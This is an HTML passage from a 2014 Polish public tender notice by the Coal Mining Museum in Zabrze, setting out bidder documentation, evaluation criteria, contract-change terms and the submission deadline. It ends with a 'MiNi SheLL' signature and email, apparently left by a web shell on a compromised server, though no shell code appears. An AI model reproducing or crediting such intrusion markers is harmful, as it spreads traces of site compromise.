<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p><BR> Zawartość oferty <BR>
1. Oferta, zastrzeżeniem pkt 10.6.2 i  10.7 SIWZ ,  musi  zawierać:<BR>
1)	Formularz oferty wraz  z oświadczeniem o spełnieniu warunków udziału w postępowaniu (część A wg Spisu zawartości oferty) złożony w formie oryginału<BR>
2)	Oświadczenie o braku podstaw do wykluczenia (część B wg Spisu zawartości oferty) złożone 
w formie oryginału <BR>
3)	Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione 
w pkt  5.2. (5.2.1. 5.2.2. 5.2.3.) i 5.3 SIWZ (jeżeli dotyczy) , złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę<BR> 
4)	wypełniony  odpowiednio Formularz cenowy <BR>  5)	Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby niezbędne do realizacji zamówienia <BR>
6)	oświadczenie o przynależności wraz z listą podmiotów należących do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. 
o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.) <BR>

10.6.2. Oferta Wykonawców wspólnie ubiegających  się o udzielenie zamówienia musi zawierać: <BR>
1)	wspólny formularz oferty wraz  z oświadczeniem o spełnieniu warunków udziału 
w postępowaniu (część A wg Spisu zawartości oferty), złożony w formie oryginału<BR>
2)	oświadczenie o braku podstaw do wykluczenia (część B wg Spisu zawartości oferty), złożone przez każdego z wykonawców wspólnie ubiegających się o zamówienia -  złożone 
w formie oryginału<BR>
3)	dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione w pkt 5.2. (5.2.1. 5.2.2. 5.2.3.) i 5.3 SIWZ (jeżeli dotyczy). Dokumenty muszą  być złożone 
w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, przy czym:<BR>
A)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa dokumenty stanowiące Załączniki nr 1.1,  1.4,  6, 7, 8.(1-n), 9.(1-n), 11 , B, wg Spisu zawartości oferty<BR>
B)	każdy z Wykonawców, który wykazuje spełnienie danego warunku w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa odpowiednio dokumenty stanowiące Załączniki nr: 3(1-n), 2.c wg Spisu zawartości oferty,<BR>
C)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa wypełnione odpowiednio lub z adnotacją (-nie dotyczy) Załączniki nr 3, 4, 5 wg Spisu zawartości oferty,
4)	wspólny Formularz cenowy (część D wg Spisu zawartości oferty)<BR>
5)	Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby niezbędne do realizacji zamówienia <BR> 6)	oświadczenie o przynależności wraz z listą podmiotów należących do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy 
z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.) złożone w formie oryginału, przez każdego z Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia <BR></p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Samodzielna realizacja zamówienia - 18</li>
<li>3 - Doświadczenie personelu WYkonawcy - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1) zmiany personelu Wykonawcy lub Zamawiającego na skutek zdarzeń losowych, zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska; zmiana personelu Wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień co najmniej równoważnych (W przypadku zmiany personelu, za udział którego Wykonawca otrzymał punkty w kryterium oceny ofert, dopuszczalna jest zmiana na personel o kwalifikacjach i doświadczeniu spełniających wymóg SIWZ uprawniający do otrzymania dodatkowych punktów), <BR>
2) zmiany podwykonawców pod warunkiem, że nowy podwykonawca wykaże  spełnianie warunków  wskazanych w opisie przedmiotu zamówienia w zakresie nie mniejszym niż wymagane w SIWZ,<BR>
3) wprowadzenie podwykonawcy pomimo deklaracji wykonawcy w ofercie o wykonaniu danego zakresu przedmiotu zamówienia wyłącznie siłami własnymi (nie dotyczy zakresu, za który Wykonawca otrzymał punkty w kryterium oceny ofert), <BR>
4) wprowadzenie dodatkowego personelu Wykonawcy z przyczyn o obiektywnym charakterze zaakceptowanych przez Zamawiającego pod warunkiem spełnienia  warunków w zakresie nie mniejszym niż wymagane w SIWZ, <BR>
5) ustawowa zmiana stawki podatku VAT, której zastosowania nie będzie skutkowało zmianą wartości brutto umowy, <BR>
6) ograniczenia przedmiotu zamówienia, w szczególności  w przypadku kiedy Zamawiający nie mógł takiej sytuacji przewidzieć,<BR>
7) zmian organizacyjnych: nazwy, adresu, numeru RIK, numeru NIP i REGON oraz osób reprezentujących Zamawiającego, <BR>
8) sposobu fakturowania i realizowania płatności za wykonane usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumgornictwa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> <BR>Muzeum Górnictwa Węglowego w Zabrzu<BR>
ul. Jodłowa 59 <BR>
41-800 Zabrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 10:00, miejsce: <BR>Muzeum Górnictwa Węglowego w Zabrzu<BR>
ul. Jodłowa 59 <BR>
41-800 Zabrze <BR>
Sekretariat, pok. 1.02.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com